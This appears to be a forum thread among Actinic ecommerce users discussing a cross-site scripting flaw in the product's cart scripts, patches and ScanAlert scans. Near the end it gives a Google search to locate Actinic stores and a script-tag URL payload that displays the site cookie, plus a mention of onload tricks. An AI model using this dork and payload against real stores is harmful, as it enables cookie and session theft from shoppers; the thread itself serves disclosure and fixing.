don't delete

Hi Norman

Thank you for the input.
I don't think your post should be deleted; this is a serious flaw that needs to be addressed.

We now use the ScanAlert service, below is their description of the flaw and possible consequences:

"The cross-site scripting attack is one of the most common, yet overlooked, security problems facing web developers today. A web site is vulnerable if it displays user-submitted content without checking for malicious script tags.

The target of cross-site scripting attacks is not the server itself, but the user files on the server, such as forms and other dynamic content. All a malicious attacker needs to do is find a page that does not properly sanitize user input, but returns the scripting code verbatim to the browser of a visitor to that website. It is important to note that websites that use SSL are just as vulnerable as websites that do not encrypt browser sessions.

The damage caused by such an attack can range from stealing session and cookie data from your customers to loading a virus payload onto their computer via browser."


Given that we are all running ecommerce operations this could be a serious issue. Also we would not necessarily be aware of it until it was too late.

This does need a fix for all versions of Actinic, not just current versions.

Given that Actinic is the leader in ecommerce solutions it is not unreasonable to suppose that someone has already tried this exploit.

This is not the first time we have come across serious security flaws in the product or a lacklustre response.

"Lacklustre response"? Be fair, it was only publicly reported as recently as February 2002

I have a custom actinic.pm for both 851 (first version) and 703 which both pass Scanalert. Both of these came via Actinic so I would assume the v8 fix will be in the next patch.

actually, there is a fair few inline tricks you can use to cross site script.

how about the image onload tag?

Actinic/John - is there any chance of others getting these (I am running 707), particularly if this thread is going to tell everyone how to hack our sites

We are currently running Business v 7.0.4.

Any chance of sharing this with us or Actinic making it available for all previous versions?

It's important to remember that these cross-site scripting issues are theoretical, and there have never been any reports of malicious activity on Actinic sites (I did try Norman's posted code, but just got a script error).

But because ScanAlert is another one of these automated validation engines that require everyone to jump through their particular hoops, we are making some changes on the next build of 8.5.2 so Actinic stores pass the ScanAlert tests.

there's going to be a NEXT build of 8.5.2??
Or do you mean for the release of 8.5.2? (in which case it can't be that imminent LOL)

This is the one. I probably should have had a comma in there.

sorry, Chris
I wasn't meaning to sound pedantic. I just had visions of various incarnations of 8.5.2 to rival the dual-personality of 8.5.1

http://community.actinic.com/showthr...highlight=hack

this site appears to have been hacked to delivery a virus - are you sure that wasn't delivered to the page by cross site scripting?


I tried the pasted code



and it worked, notice the nice Google G. This is a problem - and we're on 8.5.1

Triple you mean?

Chris said
The "A General Script Error Occurred" message isn't the important bit (just a consequence of the corrupted URL).

What's of concern is that the JavaScript that I stuck into the URL got executed in the customers browser in the context of the Site's URL. You should see a popup Alert window containing some tecchy stuff.

Luckily all it does is displays the current Site cookie with a tiny bit of formatting for legibility.

Hi Norman

I tried that in Firefox and IE without any luck, I couldn't get an alert box to appear. How odd.

Wierd. If I google for "inurl:acatalog", I get a huge list of Actinic sites. Viewing Cart in any of them and subsequently pasting ?<script>alert(unescape(document.cookie))</script> into the address bar (replacing everything after the existing ".pl" pops up the cookie here. Happens in IE. FF seems to mangle the special characters in the JS causing it not to execute.